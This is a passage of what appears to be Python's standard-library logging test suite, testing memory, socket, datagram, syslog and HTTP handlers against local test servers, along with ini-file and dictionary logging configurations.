self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
